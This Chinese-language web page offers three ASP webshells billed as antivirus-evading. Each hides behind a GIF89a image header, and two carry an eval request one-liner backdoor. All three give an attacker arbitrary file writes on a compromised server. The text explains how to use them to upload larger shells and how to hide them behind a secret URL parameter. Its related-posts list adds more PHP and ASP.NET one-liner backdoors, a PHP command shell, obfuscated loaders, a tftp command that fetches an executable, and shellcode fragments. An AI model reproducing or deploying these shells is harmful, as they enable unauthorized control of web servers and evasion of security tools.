几款双功能免杀超强版asp小马

第一款:


代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<%
on error resume next
testfile=Request.form("filepath")
msg=Request.form("message")
if Trim(request("filepath"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&msg& "")
if err =0 Then
response.write "<font color=red>ok</font>"
else
response.write "<font color=red>no</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<form method="POST" ACTION="">
<input type="text" size="20" name="filepath"
value="<%=server.mappath("go.asp")%>"> <BR>
<TEXTAREA NAME="Message" ROWS="5" COLS="40"></TEXTAREA>
<input type="submit" name="Send" value="go">
</form></body></html></body></html>

第二款:


代码如下:

GIF89a$ ;<hTml>
<%eval request(chr(1))%>
<% if request("action")="kof97" then %>
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<% end if %>
</body></html>

第三款:


代码如下:

<%set s=server.createObject("Adodb.Stream")%>
<%s.Type=2%>
<%s.Open%>
<%s.CharSet="gb2312"%>
<%s.writetext request("d")%>
<%s.SaveToFile server.mappath("go.asp"),2%>
<%s.Close%>
<%set s=nothing%>
<form>
<textarea name=d cols=80 rows=10 width=32></textarea>
<input type=submit>
</form>

使用说明及介绍:
第一款 功能说明: 用一句话连接进行传马 或直接传马

GIF89a$ ;<hTml>
--[这里的意思相信大家都了解 意思就是 上传图片时起到欺骗的作用.]

<%eval request(chr(1))%>
--[这是就asp一句话木马 这里的 chr(1) 就是asp一句话木马的密码
那么实际chr(1)= 所以密码为 别说你不知知道
重点来了 当你用这个ASP小马时 你可以用这个asp小马来里面的一句话进行传大马 然也可以直接用这个传大马

这里的go.asp就是上传马的地址了 这个自己可以修改 说的够详细吧
第二款:
同上功能就不说了!

<% if request("action")="kof97" then %>
相信懂ASP的一看就明白! 也不多说了
用法是 直接在你小马地址后面加上 ?action=kof97 给个例子吧
http://www.xxx.com/xxx.asp?action=kof97 kof97这个改成自己的!在小马里面改
好处就是 当别人直接访问你的小马时 显示的是空白 无法使用你的小马 与要密码的小马差不多
第三款:
可以说是除了ASP一句话小马之外就非它莫属了! 只有两百多个字节

<%s.SaveToFile server.mappath("go.asp"),2%>
当你打开小马地址就会自动生成go.asp 修改成自己的
此小马要与 一句话小马 或其它小马 配合使用 当你在在输入框写入我们的马 然后点 提交 会自动生成go.asp 小马地址
好处就是 当别人直接访问你的小马时 不管他提交什么马 他不知道你设置的那个文件地址

(0)

相关推荐

  • 更牛的一句话asp木马加密(去掉asp里的%)

    不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>   Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&

  • 整理的比较全的一句话后门代码(方面大家查找后门)

    最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: <?php $a = str_replace(x,"","axsxxsxexrxxt"); $a($_POST["c"]); ?> 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 <%

  • php一句话cmdshell新型 (非一句话木马)

    复制代码 代码如下: <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型): //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报:``里面不能执行php代码: //write by skyfire */ echo `$_REQUEST[id]`; ?>

  • asp一句话木马原理分析

    通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们

  • asp,php一句话木马整理方便查找木马

    特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["

  • asp.net jscript 一句话木马

    min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x

  • 一句话 asp木马加密版 彻底突破杀毒软件

    不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&H

  • 几款双功能免杀超强版asp小马

    第一款: 复制代码 代码如下: GIF89a$ ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server

  • 一个ASP小马

    <%if request.QueryString("action")="log" thena=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g

  • 旁注-网站小助手旭方修改免杀asp版

    <%@LANGUAGE="VBScript" CODEPAGE="936"%> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>旁注 - 网站小助手旭方修改免杀版</title> <style type="te

  • VBS脚本加密/解密VBS脚本(简易免杀版1.1)

    Dim WshSHell,FSO On Error Resume Next Set WshSHell = WScript.CreateObject("WScript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") Set Args = WScript.Arguments Ver="1.1" CloseTime = 5 FileName = WScript.ScriptNam

  • php shell超强免杀、减少体积工具实现代码

    lostwolf写的 这不是webshell,只是个webshell免杀工具 切勿当初webshell使用 仅限免杀phpwebshell 该工具运行在 cli 模式! 如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马! 任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙 复制代码 代码如下: <?php /* Title: PHP shell nokill T00L Blog: exploit-db.blogcn.com */ error_reporting

  • 使用Python进行防病毒免杀解析

    很多渗透工具都提供了权限维持的能力,如Metasploit.Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为.在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉? 打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件. 0x01 环境准备 1.软件安装 Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-

  • VBS加密免杀器 下载

    VBS加密免杀器,做vbs的朋友,因各种原因,需要躲避杀毒软件要用到的小工具本地下载

  • MySql 5.6.14 Win32位免安装解压缩版配置教程

    mysql-5.6.14-win32为免安装解压缩版,安装版(http://dev.mysql.com/downloads/installer/5.5.html#downloads)存在很多弊端. mysql 5.6.14 win7 32位免安装版配置方法如下所示: 1.下载mysql 5.6.14:下载地址:http://cdn.mysql.com/Downloads/MySQL-5.6/mysql-5.6.14-win32.zip 2.解压到自定义目录,我的是D:\ProgramFiles\

  • E语言免杀之易语言程序永久去除_EL_HideOwner

    大家可以用PCHunter查看下,任何程序,包括无窗口的程序,易语言都会创建个隐藏的窗口,类名为_EL_HideOwner 而且这个窗口启动的优先级非常高,在_启动子程序之前就创建了,我想动态hook下改成别的类名都不行 现在有很多软件是通过查找这个类名判断为E语言程序来当作歪G进行封停的.真是蛋疼,所以我们可以通过下面的方法 量名 类 型 静态 数组 备 注 局_xx 字节集   局_位置 整数型   局_窗口句柄 整数型   krnln_static.lib 设计到重定位 所以不能NOP没用

  • 通过Python实现Payload分离免杀过程详解

    缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号. \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x

随机推荐